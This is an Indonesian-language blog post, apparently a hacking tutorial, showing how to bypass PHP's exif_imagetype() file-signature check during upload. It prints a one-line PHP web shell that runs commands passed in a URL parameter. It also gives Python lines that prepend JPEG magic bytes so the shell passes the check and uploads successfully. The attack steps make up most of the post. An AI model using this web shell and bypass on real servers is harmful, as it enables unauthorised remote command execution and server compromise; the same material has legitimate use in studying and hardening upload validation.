Oke kali ini saya akan sharing cara bypass fungsi exif_imagetype(). Fungsi ini adalah fungsi yang berguna untuk memeriksa Signature dari file yang diupload. Let's dig in :
Nah disini saya mempunyai sample code yang sudah saya siapkan :
Via Pastebin :
https://pastebin.com/icdPfjHK
Mari kita test uploader berikut ini...
-Test #1
Saya akan mengupload sebuah Backdoor yang ber-ekstensi .php pada server dengan code berikut :
// <? passthru($_GET["cmd"]); ?>
Dan resultnya bisa kita tebak, yaitu backdoor tidak akan terupload.
- Test #2
Nah disini saya menggunakan Python untuk menyisipkan "Magic Number/Code (whtever)".
>>> fh = open('shell.php', 'w')
>>> fh.write('\xFF\xD8\xFF\xE0' + '<? passthru($_GET["cmd"]); ?>')
>>> fh.close()
Setelah itu kita coba upload.
Dan Result nya seperti ini :
Dan sukses terupload. untuk mengingatkan, tidak semua bisa di bypass seperti ini, karena setiap uploader menggunakan fungsi-fungsi yang berbeda.
No comments:
Post a Comment